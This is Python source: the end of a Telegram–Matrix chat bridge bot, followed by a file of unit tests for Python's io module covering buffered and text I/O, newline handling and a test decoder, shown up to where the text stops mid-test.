self.sendChatAction(chat_id, 'typing')
self.sendMessage(chat_id, "{} changed topic to: \"{}\"".format(sender, topic))
def send_kick(self, room, client):
logger.info('got kicked from %s', room)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendMessage(chat_id, 'You got kicked from {}'.format(room))
client.set_focus_room(None)
@logged_in
def set_name(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
name = match.group('matrix_name')
client.set_name(name)
self.sendMessage(chat_id, 'Set matrix display name to: {}'.format(name))
@logged_in
@focused
def emote(self, msg, match):
chat_id = msg['chat']['id']
client = self._get_client(chat_id)
body = match.group('text')
client.emote(body)
def send_invite(self, client, room):
logger.info('join room %s?', room)
chat_id = self._get_chat_id(client)
if not chat_id:
return
keyboard = {
'inline_keyboard': [
[
{
'text': 'Yes',
'callback_data': 'JOIN {}'.format(room),
},
{
'text': 'No',
'callback_data': 'NOP',
}
]
]
}
self.sendMessage(chat_id, 'You have been invited to room {}, accept?'.format(room),
reply_markup=keyboard)
# temporary fixes are permanent, lets do it the hard way
def _workaround_sendPhoto(self, sender, path, chat_id):
payload = {
'chat_id': chat_id,
'caption': sender,
}
files = {
'photo': open(path, 'rb')
}
base_url = BOT_BASE_URL.format(token=self._token, path='sendPhoto')
requests.post(base_url, params=payload, files=files)
def _workaround_sendAudio(self, sender, path, chat_id):
payload = {
'chat_id': chat_id,
'caption': sender,
}
files = {
'audio': open(path, 'rb')
}
base_url = BOT_BASE_URL.format(token=self._token, path='sendAudio')
requests.post(base_url, params=payload, files=files)
def _workaround_sendVideo(self, sender, path, chat_id):
payload = {
'chat_id': chat_id,
'caption': sender,
}
files = {
'video': open(path, 'rb')
}
base_url = BOT_BASE_URL.format(token=self._token, path='sendVideo')
requests.post(base_url, params=payload, files=files)
def send_photo(self, sender, path, client):
logger.info('path = %s', path)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'upload_photo')
self._workaround_sendPhoto(sender, path, chat_id)
# self.sendPhoto(chat_id, open(path, 'rb'))
def send_voice(self, sender, path, client):
logger.info('path = %s', path)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'upload_audio')
self._workaround_sendAudio(sender, path, chat_id)
def send_video(self, sender, path, client):
logger.info('path = %s', path)
chat_id = self._get_chat_id(client)
if not chat_id:
return
self.sendChatAction(chat_id, 'upload_video')
self._workaround_sendVideo(sender, path, chat_id)
def relay_typing(self, chat_id):
while True:
with self.users_lock:
if not self.users[chat_id]['should_type']:
return
self.sendChatAction(chat_id, 'typing')
time.sleep(2)
def start_typing_thread(self, client):
chat_id = self._get_chat_id(client)
with self.users_lock:
if self.users[chat_id]['typing_thread']:
return
typing_thread = Thread(target=self.relay_typing, args=(chat_id,))
self.users[chat_id]['should_type'] = True
typing_thread.start()
self.users[chat_id]['typing_thread'] = typing_thread
def stop_typing_thread(self, client):
chat_id = self._get_chat_id(client)
with self.users_lock:
if not self.users[chat_id]['typing_thread']:
return
typing_thread = self.users[chat_id]['typing_thread']
self.users[chat_id]['should_type'] = False
typing_thread.join()
with self.users_lock:
self.users[chat_id]['typing_thread'] = None
def _get_client(self, chat_id):
"""Get matrigram client.
Args:
chat_id: Telegram user id.
Returns:
MatrigramClient: The client associated to the telegram user with `chat_id`.
"""
try:
return self.users[chat_id]['client']
except KeyError:
logger.error('chat_id doesnt exist?')
return None
def _get_chat_id(self, client):
"""Get telegram id associated with client.
Args:
client (MatrigramClient): The client to be queried.
Returns:
str: The `chat_id` associated to the client.
"""
for chat_id, user in self.users.items():
if user['client'] == client:
return chat_id
logger.error('client without user?')
return None
|
test_io.py
|
"""Unit tests for io.py."""
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import threading
import random
import unittest
from itertools import chain, cycle
from test import test_support
import codecs
import io # The module under test
class MockRawIO(io.RawIOBase):
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
def read(self, n=None):
try:
return self._read_stack.pop(0)
except:
return b""
def write(self, b):
self._write_stack.append(b[:])
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
pass
def tell(self):
return 42
class MockFileIO(io.BytesIO):
def __init__(self, data):
self.read_history = []
io.BytesIO.__init__(self, data)
def read(self, n=None):
res = io.BytesIO.read(self, n)
self.read_history.append(None if res is None else len(res))
return res
class MockNonBlockWriterIO(io.RawIOBase):
def __init__(self, blocking_script):
self._blocking_script = list(blocking_script)
self._write_stack = []
def write(self, b):
self._write_stack.append(b[:])
n = self._blocking_script.pop(0)
if (n < 0):
raise io.BlockingIOError(0, "test blocking", -n)
else:
return n
def writable(self):
return True
class IOTest(unittest.TestCase):
def tearDown(self):
test_support.unlink(test_support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 12)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 1)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_raw_file_io(self):
f = io.open(test_support.TESTFN, "wb", buffering=0)
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
f.close()
f = io.open(test_support.TESTFN, "rb", buffering=0)
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
f.close()
def test_buffered_file_io(self):
f = io.open(test_support.TESTFN, "wb")
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
f.close()
f = io.open(test_support.TESTFN, "rb")
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
f.close()
def test_readline(self):
f = io.open(test_support.TESTFN, "wb")
f.write(b"abc\ndef\nxyzzy\nfoo")
f.close()
f = io.open(test_support.TESTFN, "rb")
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo")
f.close()
def test_raw_bytes_io(self):
f = io.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = io.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] in ('win', 'os2') or sys.platform == 'darwin':
if not test_support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
f = io.open(test_support.TESTFN, "w+b", 0)
self.large_file_ops(f)
f.close()
f = io.open(test_support.TESTFN, "w+b")
self.large_file_ops(f)
f.close()
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with open(test_support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with open(test_support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with io.open(test_support.TESTFN, "wb") as f:
f.write(b"xxx")
with io.open(test_support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with io.open(test_support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with io.open(test_support.TESTFN, "a") as f:
self.assert_(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(io.FileIO):
def __del__(self):
record.append(1)
io.FileIO.__del__(self)
def close(self):
record.append(2)
io.FileIO.close(self)
def flush(self):
record.append(3)
io.FileIO.flush(self)
f = MyFileIO(test_support.TESTFN, "w")
f.write("xxx")
del f
self.assertEqual(record, [1, 2, 3])
def test_close_flushes(self):
f = io.open(test_support.TESTFN, "wb")
f.write(b"xxx")
f.close()
f = io.open(test_support.TESTFN, "rb")
self.assertEqual(f.read(), b"xxx")
f.close()
def XXXtest_array_writes(self):
# XXX memory view not available yet
a = array.array('i', range(10))
n = len(memoryview(a))
f = io.open(test_support.TESTFN, "wb", 0)
self.assertEqual(f.write(a), n)
f.close()
f = io.open(test_support.TESTFN, "wb")
self.assertEqual(f.write(a), n)
f.close()
def test_closefd(self):
self.assertRaises(ValueError, io.open, test_support.TESTFN, 'w',
closefd=False)
def testReadClosed(self):
with io.open(test_support.TESTFN, "w") as f:
f.write("egg\n")
with io.open(test_support.TESTFN, "r") as f:
file = io.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError,
io.open, test_support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with io.open(test_support.TESTFN, "wb") as f:
f.write(b"egg\n")
with io.open(test_support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = io.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
class MemorySeekTestMixin:
def testInit(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
def testRead(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEquals(buf[:1], bytesIo.read(1))
self.assertEquals(buf[1:5], bytesIo.read(4))
self.assertEquals(buf[5:], bytesIo.read(900))
self.assertEquals(self.EOF, bytesIo.read())
def testReadNoArgs(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEquals(buf, bytesIo.read())
self.assertEquals(self.EOF, bytesIo.read())
def testSeek(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
bytesIo.read(5)
bytesIo.seek(0)
self.assertEquals(buf, bytesIo.read())
bytesIo.seek(3)
self.assertEquals(buf[3:], bytesIo.read())
self.assertRaises(TypeError, bytesIo.seek, 0.0)
def testTell(self):
buf = self.buftype("1234567890")
bytesIo = self.ioclass(buf)
self.assertEquals(0, bytesIo.tell())
bytesIo.seek(5)
self.assertEquals(5, bytesIo.tell())
bytesIo.seek(10000)
self.assertEquals(10000, bytesIo.tell())
class BytesIOTest(MemorySeekTestMixin, unittest.TestCase):
@staticmethod
def buftype(s):
return s.encode("utf-8")
ioclass = io.BytesIO
EOF = b""
class StringIOTest(MemorySeekTestMixin, unittest.TestCase):
buftype = str
ioclass = io.StringIO
EOF = ""
class BufferedReaderTest(unittest.TestCase):
def testRead(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcdef", bufio.read(6))
def testBuffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = MockFileIO(data)
bufio = io.BufferedReader(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEquals(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
self.assertEquals(rawio.read_history, raw_read_sizes)
def testReadNonBlocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = MockRawIO((b"abc", b"d", None, b"efg", None, None))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcd", bufio.read(6))
self.assertEquals(b"e", bufio.read(1))
self.assertEquals(b"fg", bufio.read())
self.assert_(None is bufio.read())
self.assertEquals(b"", bufio.read())
def testReadToEof(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcdefg", bufio.read(9000))
def testReadNoArgs(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(b"abcdefg", bufio.read())
def testFileno(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedReader(rawio)
self.assertEquals(42, bufio.fileno())
def testFilenoNoFileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def testThreads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = range(256) * N
random.shuffle(l)
s = bytes(bytearray(l))
with io.open(test_support.TESTFN, "wb") as f:
f.write(s)
with io.open(test_support.TESTFN, "rb", buffering=0) as raw:
bufio = io.BufferedReader(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
test_support.unlink(test_support.TESTFN)
class BufferedWriterTest(unittest.TestCase):
def testWrite(self):
# Write to the buffered IO but don't overflow the buffer.
writer = MockRawIO()
bufio = io.BufferedWriter(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def testWriteOverflow(self):
writer = MockRawIO()
bufio = io.BufferedWriter(writer, 8)
bufio.write(b"abc")
bufio.write(b"defghijkl")
self.assertEquals(b"abcdefghijkl", writer._write_stack[0])
def testWriteNonBlocking(self):
raw = MockNonBlockWriterIO((9, 2, 22, -6, 10, 12, 12))
bufio = io.BufferedWriter(raw, 8, 16)
bufio.write(b"asdf")
bufio.write(b"asdfa")
self.assertEquals(b"asdfasdfa", raw._write_stack[0])
bufio.write(b"asdfasdfasdf")
self.assertEquals(b"asdfasdfasdf", raw._write_stack[1])
bufio.write(b"asdfasdfasdf")
self.assertEquals(b"dfasdfasdf", raw._write_stack[2])
self.assertEquals(b"asdfasdfasdf", raw._write_stack[3])
bufio.write(b"asdfasdfasdf")
# XXX I don't like this test. It relies too heavily on how the
# algorithm actually works, which we might change. Refactor
# later.
def testFileno(self):
rawio = MockRawIO((b"abc", b"d", b"efg"))
bufio = io.BufferedWriter(rawio)
self.assertEquals(42, bufio.fileno())
def testFlush(self):
writer = MockRawIO()
bufio = io.BufferedWriter(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEquals(b"abc", writer._write_stack[0])
def testThreads(self):
# BufferedWriter should not raise exceptions or crash
# when called from multiple threads.
try:
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with io.open(test_support.TESTFN, "wb", buffering=0) as raw:
bufio = io.BufferedWriter(raw, 8)
errors = []
def f():
try:
# Write enough bytes to flush the buffer
s = b"a" * 19
for i in range(50):
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
finally:
test_support.unlink(test_support.TESTFN)
class BufferedRWPairTest(unittest.TestCase):
def testRWPair(self):
r = MockRawIO(())
w = MockRawIO()
pair = io.BufferedRWPair(r, w)
self.assertFalse(pair.closed)
# XXX More Tests
class BufferedRandomTest(unittest.TestCase):
def testReadAndWrite(self):
raw = MockRawIO((b"asdf", b"ghjk"))
rw = io.BufferedRandom(raw, 8, 12)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read()) # This read forces write flush
self.assertEquals(b"dddeee", raw._write_stack[0])
def testSeekAndTell(self):
raw = io.BytesIO(b"asdfghjkl")
rw = io.BufferedRandom(raw)
self.assertEquals(b"as", rw.read(2))
self.assertEquals(2, rw.tell())
rw.seek(0, 0)
self.assertEquals(b"asdf", rw.read(4))
rw.write(b"asdf")
rw.seek(0, 0)
self.assertEquals(b"asdfasdfl", rw.read())
self.assertEquals(9, rw.tell())
rw.seek(-4, 2)
self.assertEquals(5, rw.tell())
rw.seek(2, 1)
self.assertEquals(7, rw.tell())
self.assertEquals(b"fl", rw.read(11))
self.assertRaises(TypeError, rw.seek, 0.0)
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def testDecoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEquals(d.decode(b'oiabcd'), '')
self.assertEquals(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
def tearDown(self):
test_support.unlink(test_support.TESTFN)
def testLineBuffering(self):
r = io.BytesIO()
b = io.BufferedWriter(r, 1000)
t = io.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write(u"X")
self.assertEquals(r.getvalue(), b"") # No flush happened
t.write(u"Y\nZ")
self.assertEquals(r.getvalue(), b"XY\nZ") # All got flushed
t.write(u"A\rB")
self.assertEquals(r.getvalue(), b"XY\nZA\rB")
def testEncodingErrorsReading(self):
# (1) default
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEquals(t.read(), "abc\n\n")
# (4) replace
b = io.BytesIO(b"abc\n\xff\n")
t = io.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEquals(t.read(), u"abc\n\ufffd\n")
def testEncodingErrorsWriting(self):
# (1) default
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, u"\xff")
# (2) explicit strict
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, u"\xff")
# (3) ignore
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write(u"abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abcdef\n")
# (4) replace
b = io.BytesIO()
t = io.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write(u"abc\xffdef\n")
t.flush()
self.assertEquals(b.getvalue(), b"abc?def\n")
def testNewlinesInput(self):
testdata = b"AAA\nBBB\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BBB\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBBB\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBBB\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = io.BytesIO(testdata)
txt = io.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEquals(txt.readlines(), expected)
txt.seek(0)
self.assertEquals(txt.read(), "".join(expected))
def testNewlinesOutput(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = io.BytesIO()
txt = io.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEquals(buf.closed, False)
self.assertEquals(buf.getvalue(), expected)
def testNewlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = io.BufferedReader(io.BytesIO(data), bufsize)
textio = io.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEquals(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEquals(got_line, exp_line)
self.assertEquals(len(got_lines), len(exp_lines))
def testNewlinesInput(self):
testdata = b"AAA\nBBB\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BBB\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBBB\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBBB\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = io.BytesIO(testdata)
txt = io.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEquals(txt.readlines(), expected)
txt.seek(0)
self.assertEquals(txt.read(), "".join(expected))
def testNewlinesOutput(self):
data = u"AAA\nBBB\rCCC\n"
data_lf = b"AAA\nBBB\rCCC\n"
data_cr = b"AAA\rBBB\rCCC\r"
data_crlf = b"AAA\r\nBBB\rCCC\r\n"
save_linesep = os.linesep
try:
for os.linesep, newline, expected in [
("\n", None, data_lf),
("\r\n", None, data_crlf),
("\n", "", data_lf),
("\r\n", "", data_lf),
("\n", "\n", data_lf),
("\r\n", "\n", data_lf),
("\n", "\r", data_cr),
("\r\n", "\r", data_cr),
("\n", "\r\n", data_crlf),
("\r\n", "\r\n", data_crlf),
]:
buf = io.BytesIO()
txt = io.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write(data)
txt.close()
self.assertEquals(buf.closed, True)
self.assertRaises(ValueError, buf.getvalue)
finally:
os.linesep = save_linesep
# Systematic tests of the text I/O API
def testBasicIO(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = io.open(test_support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.write(u"abc"), 3)
f.close()
f = io.open(test_support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.tell(), 0)
self.assertEquals(f.read(), u"abc")
